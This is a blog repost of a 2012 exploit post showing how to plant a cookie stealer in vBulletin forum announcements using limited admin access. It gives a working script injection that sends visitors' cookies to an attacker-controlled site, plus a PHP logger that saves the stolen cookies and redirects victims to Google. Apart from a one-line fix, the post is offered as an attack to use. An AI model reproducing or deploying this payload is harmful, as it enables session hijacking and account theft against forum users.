Sunday, December 16, 2012

vBulletin Announcements, by default has html enabled, so if you get access to a forum using other exploits and get a user with acp info, but it only has default admin cp permissions (moderator access and announcements), you can inject a cookie stealer and steal other users informations.
admincp>announcements>create a new one>put some random announcemnt + this code:

<script language="JavaScript">
document.location= " http://www.yoursite.com/cookie.php?p=" + document.cookie; </script>

and in your site put this and name it cookie.php

<?php
$cookie = $HTTP_GET_VARS[" p"];
$file = fopen('cookielog.txt', 'a');
fwrite($file, $cookie . "\n\n");
echo " <script>location.href='http://www.google.com';</script>";
?>

If you're the owner, a "fix" for this is disallow html in announcements.
# 1337day.com [2012-12-16]

vBulletin Announcements Cookie Steal Vulnerability

  • Uploaded by: MIN Software
  • Views:
  • Share

    0 comments:

    Post a Comment

     

    Our Team Members

    Copyright © hacker va bao mat | Designed by Templateism.com | WPResearcher.com